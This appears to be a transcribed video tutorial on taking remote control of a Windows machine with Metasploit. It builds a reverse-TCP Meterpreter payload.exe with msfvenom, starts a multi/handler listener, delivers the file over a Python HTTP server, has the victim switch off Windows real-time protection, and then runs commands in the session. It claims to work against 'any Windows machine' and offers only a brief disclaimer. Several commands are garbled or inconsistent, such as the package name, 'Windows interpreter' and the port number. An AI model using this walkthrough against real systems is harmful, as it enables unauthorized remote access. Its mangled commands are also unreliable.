Hi amazing hackers, welcome back to the another episode of HackTheMatrix. So in this video we are going to learn about Metasploit to exploit any Windows machine and get remote access. So this video is only for the education purpose. If you are doing wrong purpose, so we are not responsible for that. So first of all, run our terminal. You need to download one tool, Metasploitable framework. So type here sudo apt Metasploitable framework and type your password. So this tool I have already downloaded. So we are going to create payload for the Windows. So type here MSFVenom and -p for the payload. And type here WI and Windows. Interpreter. So -p for the Windows interpreter is a session handler and ours reverse TCP. And also you need to set here L host equal to our IP address. So check out IP address using ifconfig. In my case, my IP address is this one. Copy this, paste here, and also you need to set here L port. So I'm going to give random and type -f for the extension type. So we are going to generate payload for the Windows. So type here exe. And for the output you can use a redirection operator and -o. So I'm going to use a redirection operator and payload.exe. So our payload name is payload.exe and hit enter. And type here ls. So see, our payload is successfully generated. So first of all, before running this payload.exe on the target system, you need to create one listener. So we are going to create listener using MSF console. After that we go to type here use exploit multi-handler and type here set payload Windows interpreter reverse _ TCP and hit enter. So here we need to give this one. After that you need to set L host. So type here also our IP address. So I'm giving this IP address, paste here, and also set L host. L port. So in my case I have set it L port 4444. So also I am going to give 444 and after that type here exploit and you need to execute this file. So I'm gonna to share this payload in our Windows operating system. So I'm running one Windows operating system in our VMware virtual machine. So first of all, need to run here python 3-m http dot. So this command creates one local server for the accessing our file. So it working on this IP address. So copy this and go on this browser and type here, also type here port 8000. So this one is running on the default port. So see, we have payload.txt and readme.md. So also in my case here have two files. So with the help of this command, we are accessing file anywhere in the local area network. So first of all, you need to turn off our Windows firewall real-time protection. So go here, manage setting and turn off it. After that, go to download this one. So keep here, keep anywhere, and open this. And after that, go ahead and see our Metasploit session is started. So you are able to run any command those you are running on the CMD. So first we are going to run dir. So see here we got winpacket setup desktop ini payload.txt and we have visual folder and payload.txt. So see also here having 5-6 files. So let's type here more help command. So see we have lots of help command. So we have lls, ls, mxdr. So we are going to create one file. So first of all, you see here we don't have test name file. So we are going to create on the our Linux. So hit enter and type here ls. So see tests are created on the Windows operating system. See here, and after that you go to type here get UID. So see my UID is desktop HackTheMatrix. So today video that's it. So thanks for watching this video. I hope you enjoy it.